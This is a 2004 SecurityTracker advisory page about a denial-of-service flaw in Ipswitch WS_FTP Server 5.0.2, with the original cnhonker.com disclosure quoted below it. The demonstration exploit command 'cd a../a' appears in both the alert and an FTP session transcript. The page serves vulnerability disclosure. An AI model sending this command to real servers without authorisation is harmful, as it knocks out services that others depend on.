SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
WS_FTP CD Command Path Parsing Flaw May Let Remote Authenticated Users Deny Service
SecurityTracker Alert ID:  1011095
SecurityTracker URL:  http://securitytracker.com/id/1011095
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 31 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 5.0.2
Description:   A denial of service vulnerability was reported in WS_FTP. A remote authenticated user can cause the FTP service to consume excessive CPU resources.

lion from cnhonker.com reported that a remote authenticated user (including an anonymous user) can issue a specially crafted CD command to trigger the vulnerability. A demonstration exploit command is provided:

cd a../a

Impact:   A remote user can cause the target FTP service to consume excessive CPU resources.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ipswitch.com/products/ws_ftp-server/index.html (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  [vulnwatch] WS_FTP Server Denial of Service Vulnerability


[vulnwatch] WS_FTP Server Denial of Service Vulnerability

www.cnhonker.com
Security Advisory

Advisory Name: WS_FTP Server Denial of Service Vulnerability
Release Date: 08/30/2004
Affected version: WS_FTP Server 5.0.2
Author: lion <lion@cnhonker.net>

Overview: 

A vulnerability has been found in WS_FTP Server. The problem \
is in the module of file path parse will cause FTP server to \
consume large amounts of CPU power.

Exploit:

E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a 
Connection closed by remote host.

About HUC:

HUC is still alive.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC